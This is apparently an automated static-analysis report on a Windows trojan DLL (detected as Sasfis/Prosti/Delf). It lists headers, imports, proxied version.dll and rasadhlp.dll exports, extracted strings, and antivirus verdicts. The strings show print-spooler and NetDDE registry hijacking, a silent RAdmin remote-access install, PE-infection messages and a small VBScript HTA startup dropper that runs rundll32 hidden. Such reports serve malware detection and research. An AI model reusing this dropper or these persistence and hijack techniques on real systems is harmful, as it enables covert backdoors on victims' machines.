PE Compile Time

1992-06-20 01:22:17

PE Imphash

ba694797a91dfe791ab791c148c863ad

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
CODE    0x00001000       0x0001fc68    0x0001fe00        7.66496381647
DATA    0x00021000       0x00000304    0x00000400        4.69946397202
BSS     0x00022000       0x00000a09    0x00000000        0.0
.idata  0x00023000       0x000009e0    0x00000a00        4.74963164364
.edata  0x00024000       0x00000537    0x00000600        5.04491828462
.reloc  0x00025000       0x00000ca0    0x00000e00        6.47558706989
.rsrc   0x00026000       0x00000200    0x00000200        4.23838758755

Resources

Name       Offset      Size        Language      Sub-language     File type
RT_RCDATA  0x000260c0  0x000000f0  LANG_NEUTRAL  SUBLANG_NEUTRAL  data
RT_RCDATA  0x000260c0  0x000000f0  LANG_NEUTRAL  SUBLANG_NEUTRAL  data

Imports

Library kernel32.dll:
0x43e730b4 DeleteCriticalSection
0x43e730b8 LeaveCriticalSection
0x43e730bc EnterCriticalSection
0x43e730c4 VirtualFree
0x43e730c8 VirtualAlloc
0x43e730cc LocalFree
0x43e730d0 LocalAlloc
0x43e730d4 GetTickCount
0x43e730dc GetVersion
0x43e730e0 GetCurrentThreadId
0x43e730e4 GetThreadLocale
0x43e730e8 GetStartupInfoA
0x43e730ec GetModuleFileNameA
0x43e730f0 GetLocaleInfoA
0x43e730f4 GetCommandLineA
0x43e730f8 FreeLibrary
0x43e730fc ExitProcess
0x43e73100 WriteFile
0x43e73108 RtlUnwind
0x43e7310c RaiseException
0x43e73110 GetStdHandle
Library user32.dll:
0x43e73118 GetKeyboardType
0x43e7311c MessageBoxA
0x43e73120 CharNextA
Library advapi32.dll:
0x43e73128 RegQueryValueExA
0x43e7312c RegOpenKeyExA
0x43e73130 RegCloseKey
Library kernel32.dll:
0x43e73138 TlsSetValue
0x43e7313c TlsGetValue
0x43e73140 TlsFree
0x43e73144 TlsAlloc
0x43e73148 LocalFree
0x43e7314c LocalAlloc
Library advapi32.dll:
0x43e73158 RegSetValueExA
0x43e7315c RegQueryValueExA
0x43e73160 RegOpenKeyExA
0x43e73164 RegEnumValueA
0x43e73168 RegEnumKeyExA
0x43e7316c RegDeleteValueA
0x43e73170 RegDeleteKeyA
0x43e73174 RegCreateKeyExA
0x43e73178 RegCloseKey
0x43e7317c OpenProcessToken
0x43e73180 LookupPrivilegeValueA
0x43e73188 AdjustTokenPrivileges
Library kernel32.dll:
0x43e73190 lstrcpyA
0x43e73194 WriteFile
0x43e73198 VirtualProtect
0x43e7319c VirtualFree
0x43e731a0 VirtualAlloc
0x43e731a4 TerminateProcess
0x43e731a8 Sleep
0x43e731ac SetFileTime
0x43e731b0 SetFilePointer
0x43e731b4 SetFileAttributesA
0x43e731b8 SetCurrentDirectoryA
0x43e731bc RemoveDirectoryA
0x43e731c0 ReadFile
0x43e731c4 OpenProcess
0x43e731c8 MoveFileExA
0x43e731cc MapViewOfFile
0x43e731d0 LoadLibraryA
0x43e731d4 GetTickCount
0x43e731d8 GetSystemDirectoryA
0x43e731dc GetProcAddress
0x43e731e0 GetModuleHandleA
0x43e731e4 GetModuleFileNameA
0x43e731e8 GetLastError
0x43e731ec GetFileTime
0x43e731f0 GetFileSize
0x43e731f4 GetFileAttributesA
0x43e731fc GetCurrentProcessId
0x43e73200 GetCurrentProcess
0x43e73204 GetCurrentDirectoryA
0x43e73208 GetCommandLineA
0x43e7320c FreeLibrary
0x43e73210 FindFirstFileA
0x43e73214 FindClose
0x43e7321c FileTimeToDosDateTime
0x43e73220 DeleteFileA
0x43e73224 CreateThread
0x43e73228 CreateMutexA
0x43e7322c CreateFileMappingA
0x43e73230 CreateFileA
0x43e73234 CreateDirectoryA
0x43e73238 CopyFileA
0x43e7323c CloseHandle
Library user32.dll:
0x43e73244 MessageBoxA
Library advapi32.dll:
0x43e7324c StartServiceA
0x43e73250 QueryServiceStatus
0x43e73254 OpenServiceA
0x43e73258 OpenSCManagerA
0x43e7325c DeleteService
0x43e73260 ControlService
0x43e73264 CloseServiceHandle

Exports

Ordinal Address Name
40 0x43e705b4 AcsHlpAttemptConnection
39 0x43e705ec AcsHlpN624
38 0x43e70618 AcsHlpNbConnection
37 0x43e7064c AcsHlpNo942
36 0x43e70678 AcsHlpNoteNewConnection
44 0x43e6f830 DllEntry
43 0x43e6f874 DllEntry2
45 0x43e70b48 DllImport
46 0x43e6f394 DllService
47 0x43e6f814 Dllrun
29 0x43e6fee0 GetFileVersionInfoA
28 0x43e6ff14 GetFileVersionInfoB766
27 0x43e6ff4c GetFileVersionInfoByHandle
26 0x43e6ff88 GetFileVersionInfoE886
25 0x43e6ffc0 GetFileVersionInfoExW
24 0x43e6fff8 GetFileVersionInfoS661
23 0x43e70030 GetFileVersionInfoSizeA
22 0x43e70068 GetFileVersionInfoSizeE173
21 0x43e700a4 GetFileVersionInfoSizeExW
19 0x43e7011c GetFileVersionInfoSizeW
20 0x43e700e0 GetFileVersionInfoSizeW955
17 0x43e7018c GetFileVersionInfoW
18 0x43e70154 GetFileVersionInfoW382
41 0x43e6fd70 InitializePrintMonitor2
42 0x43e70820 MakeInst
16 0x43e701c0 V350
15 0x43e701e8 VerFindFileA
13 0x43e70248 VerFindFileW
14 0x43e70218 VerFindFileW923
12 0x43e70278 VerI524
11 0x43e702a0 VerInstallFileA
9 0x43e70304 VerInstallFileW
10 0x43e702d0 VerInstallFileW834
8 0x43e70334 VerL242
7 0x43e7035c VerLanguageNameA
5 0x43e703c4 VerLanguageNameW
6 0x43e70390 VerLanguageNameW499
4 0x43e703f8 VerQ805
3 0x43e70420 VerQueryValueA
1 0x43e70484 VerQueryValueW
2 0x43e70450 VerQueryValueW337
35 0x43e706b0 W658
34 0x43e706d8 WSAttemptAutodialAddr
33 0x43e70710 WSAttemptAutodialN932
32 0x43e70748 WSAttemptAutodialName
31 0x43e70780 WSN224
30 0x43e707a8 WSNoteSuccessfulHostentLookup
This program must be run under Win32
.idata
.edata
P.reloc
P.rsrc
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
PSAPI.dll
EnumProcesses
EnumProcessModules
GetModuleBaseNameA
GetModuleFileNameExA
GetModuleBaseNameW
GetModuleFileNameExW
GetModuleInformation
EmptyWorkingSet
QueryWorkingSet
InitializeProcessForWsWatch
GetMappedFileNameA
GetDeviceDriverBaseNameA
GetDeviceDriverFileNameA
GetMappedFileNameW
GetDeviceDriverBaseNameW
GetDeviceDriverFileNameW
EnumDeviceDrivers
GetProcessMemoryInfo
QueryServiceStatusEx
advapi32.dll
advapi32.dll
ChangeServiceConfig2A
advapi32.dll
CreateServiceA
SystemRoot
:\Recycler\
C:\Recycled
:\Recycled\
C:\$RECYCLE.BIN
:\$RECYCLE.BIN\
SeDebugPrivilege
tracert.exe
\com\NOLOG
com\comb.dll
com\comb.dll
\Temp\comb.dll
CreateProcessA
kernel32.dll
- Initialization Error!
Program Warnning
GetProcAddress
kernel32.dll
LoadLibraryA
kernel32.dll
kernel32.dll
kernel32.dll
GetProcAddress
LoadLibraryA
VirtualAlloc
kernel32.dll
LoadLibraryA
GetProcAddress
SYSTEM32
SYSWOW64
Global\||
Get Failed!!!!!
Total Import Dlls:
GetMemory failed. --err: %d\n", GetLastError()
TotalLen needed:
Space Available:
BIGGEST Space Available:
Memory Scan RawDataAddr...
[V] Modify PE file Successfully
rundll32.exe "
" JustForTest
PE infected and test SuccessFully
PE Replaced SuccessFully
InitializePrintMonitor2
Dllrun
spoolerlogs\spooler.xml
spoolerlogs
C:\Load.hta
SYSTEM\CurrentControlSet\Services\NetDDE\DllForInstall
ForTest.dll
DllImport
SYSTEM\CurrentControlSet\Control\Print\Monitors\SCSI Port Monitor\Driver
com\comb.dll
SystemDrive
\AppPatch\
C:\Temp
C:\Temp\AppPatch\
comb.dll
spoolsv.exe
svchost.exe
scsimon.dll
ComBack.Dll
Size:
Loaded:
Size:
Loaded:
Radmin.bin
RegSrvc.exe
Regsrvc
SOFTWARE\RAdmin\v1.01\ViewType\Installed
SOFTWARE\RAdmin\v1.01\ViewType\Data
SYSTEM\RAdmin\v2.0\Server\parameters\DisableTrayIcon
SYSTEM\RAdmin\v2.0\Server\parameters\AskUser
SYSTEM\RAdmin\v2.0\Server\parameters\EnableLogFile
SYSTEM\RAdmin\v2.0\Server\parameters\EnableEventLog
SYSTEM\RAdmin\v2.0\Server\parameters\FilterIp
SYSTEM\RAdmin\v2.0\Server\parameters\Port
SYSTEM\RAdmin\v2.0\Server\parameters\Parameter
%systemroot%\system32\RegSrvc.exe /service
Registry Scan Service
RegSrvc
Regsrvc Started
SYSTEM\CurrentControlSet\Services\RegSrvc
update
spoolsv.exe
svchost.exe
SYSTEM32
SYSWOW64
SYSTEM\CurrentControlSet\Services\NetDDE\
\ServiceExe
Spooler
winspool.drv
OpenPrinterA
ClosePrinter
SYSTEM\CurrentControlSet\Services\Spooler\
SystemRoot
\system32\spoolsv.exe
%SystemRoot%\system32\spoolsv.exe
Spoolsv.exe
ImagePath
scsimon.dll
SYSTEM\CurrentControlSet\Control\Print\Monitors\SCSI Port Monitor\Driver
SpoolerGroup
ObjectName
LocalSystem
Performance\Library
winspool.drv
DependOnService
SYSTEM\CurrentControlSet\Control\Print\Monitors\SCSI Port Monitor\Driver
scsimon.dll
Falied to Set Spooler Registry
rundll32
Spooler Dll Already Installed
Installing Spooler
Spooler
Spooler Dll Not Copied
spoolsv.exe
Spooler Running ok
Description
DisplayName
Loads files to memory for later printing.
Print Spooler Service
Spooler Dll SuccessFullly Installed.
Spooler Dll Install Failed.
SYSTEM\CurrentControlSet\Services\NetDDE\Disabled\F6
ProgramFiles
\Internet Explorer\iexplore.exe
Svchost FailTimes:
svchost.exe
spoolsv.exe
SYSTEM\CurrentControlSet\Services\NetDDE\Disabled\F6
SpoolerFailTimes:
Writing Hta
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Startup
\Startup.hta
<Script lAnguAgE=VBScript>: window.movETo 1112,9999
YY="ript.ShEll":Set WS=CreateObject("WSc"+YY):WS.Run "rundll32.exe ""
"" Install", 0
window.rESizETo 9,9:window.cloSE:</Script>
Timer Sec:
SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations
SYSTEM\CurrentControlSet\Services\NetDDE\SysDll
SYSTEM\CurrentControlSet\Services\NetDDE\SysDll\
spoolsv.exe
scsimon.dll
usbmon.dll
spoolsv.exe
com\pdrv.dll
_Final_
Not Initialized Ok
Spooler
spoolsv.exe
Start Working
svchost.exe
AppLoad
Dllrun
RealHost:
HostPID:
AcSvcst.dll
spoolsv.exe
rundll32
_Final_
DllService
Start To InJect
DllService
version.dll
GetFileVersionInfoA
GetFileVersionInfoB766
GetFileVersionInfoByHandle
GetFileVersionInfoE886
GetFileVersionInfoExW
GetFileVersionInfoS661
GetFileVersionInfoSizeA
GetFileVersionInfoSizeE173
GetFileVersionInfoSizeExW
GetFileVersionInfoSizeW955
GetFileVersionInfoSizeW
GetFileVersionInfoW382
GetFileVersionInfoW
VerFindFileA
VerFindFileW923
VerFindFileW
VerI524
VerInstallFileA
VerInstallFileW834
VerInstallFileW
VerL242
VerLanguageNameA
VerLanguageNameW499
VerLanguageNameW
VerQ805
VerQueryValueA
VerQueryValueW337
VerQueryValueW
rasadhlp.dll
AcsHlpAttemptConnection
AcsHlpN624
AcsHlpNbConnection
AcsHlpNo942
AcsHlpNoteNewConnection
WSAttemptAutodialAddr
WSAttemptAutodialN932
WSAttemptAutodialName
WSN224
WSNoteSuccessfulHostentLookup
SystemDrive
Start AddImport
Dllrun
Dllrun
Runtime error at 00000000
0123456789ABCDEF
kernel32.dll
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
GetTickCount
QueryPerformanceCounter
GetVersion
GetCurrentThreadId
GetThreadLocale
GetStartupInfoA
GetModuleFileNameA
GetLocaleInfoA
GetCommandLineA
FreeLibrary
ExitProcess
WriteFile
UnhandledExceptionFilter
RtlUnwind
RaiseException
GetStdHandle
user32.dll
GetKeyboardType
MessageBoxA
CharNextA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
kernel32.dll
TlsSetValue
TlsGetValue
TlsFree
TlsAlloc
LocalFree
LocalAlloc
advapi32.dll
SetSecurityDescriptorDacl
RegSetValueExA
RegQueryValueExA
RegOpenKeyExA
RegEnumValueA
RegEnumKeyExA
RegDeleteValueA
RegDeleteKeyA
RegCreateKeyExA
RegCloseKey
OpenProcessToken
LookupPrivilegeValueA
InitializeSecurityDescriptor
AdjustTokenPrivileges
kernel32.dll
lstrcpyA
WriteFile
VirtualProtect
VirtualFree
VirtualAlloc
TerminateProcess
SetFileTime
SetFilePointer
SetFileAttributesA
SetCurrentDirectoryA
RemoveDirectoryA
ReadFile
OpenProcess
MoveFileExA
MapViewOfFile
LoadLibraryA
GetTickCount
GetSystemDirectoryA
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLastError
GetFileTime
GetFileSize
GetFileAttributesA
GetEnvironmentVariableA
GetCurrentProcessId
GetCurrentProcess
GetCurrentDirectoryA
GetCommandLineA
FreeLibrary
FindFirstFileA
FindClose
FileTimeToLocalFileTime
FileTimeToDosDateTime
DeleteFileA
CreateThread
CreateMutexA
CreateFileMappingA
CreateFileA
CreateDirectoryA
CopyFileA
CloseHandle
user32.dll
MessageBoxA
advapi32.dll
StartServiceA
QueryServiceStatus
OpenServiceA
OpenSCManagerA
DeleteService
ControlService
CloseServiceHandle
ImportDll.dll
AcsHlpAttemptConnection
AcsHlpN624
AcsHlpNbConnection
AcsHlpNo942
AcsHlpNoteNewConnection
DllEntry
DllEntry2
DllImport
DllService
Dllrun
GetFileVersionInfoA
GetFileVersionInfoB766
GetFileVersionInfoByHandle
GetFileVersionInfoE886
GetFileVersionInfoExW
GetFileVersionInfoS661
GetFileVersionInfoSizeA
GetFileVersionInfoSizeE173
GetFileVersionInfoSizeExW
GetFileVersionInfoSizeW
GetFileVersionInfoSizeW955
GetFileVersionInfoW
GetFileVersionInfoW382
InitializePrintMonitor2
MakeInst
VerFindFileA
VerFindFileW
VerFindFileW923
VerI524
VerInstallFileA
VerInstallFileW
VerInstallFileW834
VerL242
VerLanguageNameA
VerLanguageNameW
VerLanguageNameW499
VerQ805
VerQueryValueA
VerQueryValueW
VerQueryValueW337
WSAttemptAutodialAddr
WSAttemptAutodialN932
WSAttemptAutodialName
WSN224
WSNoteSuccessfulHostentLookup
ImportDll
AdvRemote
MemFuc
SysUtils2
UTypes
System
SysInit
KWindows
PEUtils2
ImageHlp
WinntService2
WinSvc
RegMini
}Buf_DIY
]Buf_CoolDll
rasadhlpEx
oversionEx
[InstallPE
LoadMsl
DVCLAL
PACKAGEINFO
Antivirus Signature
Lionic Clean
Elastic malicious (high confidence)
Cynet Malicious (score: 100)
CTX dll.trojan.aklrihi
ALYac Gen:Trojan.ExplorerHijack.iC5@aKlRihi
Cylance Unsafe
Zillya Trojan.Sasfis.Win32.25546
Sangfor Suspicious.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (D)
K7GW Trojan ( 005690671 )
K7AntiVirus Trojan ( 005690671 )
huorong Trojan/Injector.bli
Baidu Clean
VirIT Backdoor.Win32.Generic.CCLQ
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 a variant of Win32/Delf.AJO
APEX Malicious
Paloalto Clean
ClamAV Win.Trojan.Sasfis-73
Alibaba Clean
NANO-Antivirus Trojan.Win32.Sasfis.inuxo
ViRobot Clean
MicroWorld-eScan Gen:Trojan.ExplorerHijack.iC5@aKlRihi
Tencent Trojan.Win32.Sasfis.pa
Sophos Troj/Delf-HOM
F-Secure Trojan.TR/ATRAPS.Gen
DrWeb Trojan.MulDrop3.19480
VIPRE Gen:Trojan.ExplorerHijack.iC5@aKlRihi
TrendMicro Clean
McAfeeD ti!F962FBD1D380
Trapmine Clean
CMC Clean
Emsisoft Gen:Trojan.ExplorerHijack.iC5@aKlRihi (B)
Ikarus Backdoor.Win32.Prosti
GData Win32.Trojan.PSE.19YCTOZ
Jiangmin Trojan/Sasfis.lzc
Webroot W32.Malware.gen
Avira TR/ATRAPS.Gen
Antiy-AVL Trojan/Win32.Sasfis
Kingsoft malware.kb.a.999
Gridinsoft Trojan.Win32.Downloader.oa!s1
Xcitium Clean
Arcabit Trojan.ExplorerHijack.E33CEF
SUPERAntiSpyware Clean
ZoneAlarm Troj/Delf-HOM
Microsoft Backdoor:Win32/Prosti.L
Google Detected
AhnLab-V3 Trojan/Win32.Sasfis.R3331
Acronis suspicious
VBA32 Trojan.Sasfis
TACHYON Trojan/W32.DP-Sasfis.140828
Malwarebytes Generic.Malware.AI.DDS
Panda Trj/Genetic.gen
Zoner Clean
TrendMicro-HouseCall Trojan.Win32.VSX.PE04C9V
Rising Backdoor.Prosti!8.280 (TFE:3:577pK4pfyyV)
Yandex Trojan.GenAsa!YOsF5jLpW/g
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.300983.susgen
Fortinet W32/Sasfis.AQW!tr
DeepInstinct MALICIOUS
alibabacloud Worm:Win/Delf.25d92ca9
IRMA Signature
Trend Micro SProtect (Linux) Clean
Avast Core Security (Linux) Win32:MalwareX-gen [Bd]
C4S ClamAV (Linux) Win.Trojan.Sasfis-73
Trellix (Linux) Clean
Sophos Anti-Virus (Linux) Troj/Delf-HOM
Bitdefender Antivirus (Linux) Gen:Trojan.ExplorerHijack.iC5@aKlRihi
G Data Antivirus (Windows) Virus: Gen:Trojan.ExplorerHijack.iC5@aKlRihi (Engine A), Win32.Trojan.PSE.10038YY (Engine B)
WithSecure (Linux) Trojan:W32/Generic.avtd!fsmind
ESET Security (Windows) a variant of Win32/Delf.AJO trojan
DrWeb Antivirus (Linux) Trojan.MulDrop3.19480
ClamAV (Linux) Win.Trojan.Sasfis-73
eScan Antivirus (Linux) Gen:Trojan.ExplorerHijack.iC5@aKlRihi(DB)
Kaspersky Standard (Windows) Trojan.Win32.Sasfis.aqwf
Emsisoft Commandline Scanner (Windows) Gen:Trojan.ExplorerHijack.iC5@aKlRihi (B)